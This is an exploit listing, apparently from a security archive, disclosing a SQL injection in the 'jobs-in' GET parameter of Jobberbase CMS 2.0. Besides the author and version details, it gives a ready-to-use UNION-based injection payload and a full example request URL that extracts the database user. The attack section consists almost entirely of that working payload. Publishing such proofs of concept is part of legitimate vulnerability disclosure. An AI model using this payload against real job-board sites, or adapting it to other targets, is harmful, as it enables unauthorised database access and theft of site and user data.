Jobberbase CMS 2.0 SQL Injection

Jobberbase CMS version 2.0 suffers from a remote SQL injection vulnerability.


MD5 | 0b139228a74567c4bb7ed2d019950eb4

===========================================================================================
# Exploit Title: Jobberbase CMS - 'jobs-in' SQL Injection
# Dork: N/A
# Date: 30-03-2019
# Exploit Author: Suvadip Kar
# Vendor Homepage: http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: v2.0
# Category: Webapps
# Tested on: Linux
# CVE: N/A
# Software Description: Jobberbase is an open-source job board platform that enables the creation of job sites.
===========================================================================================
#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ

#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT 33,user()-- XYZ

===========================================================================================


Related Posts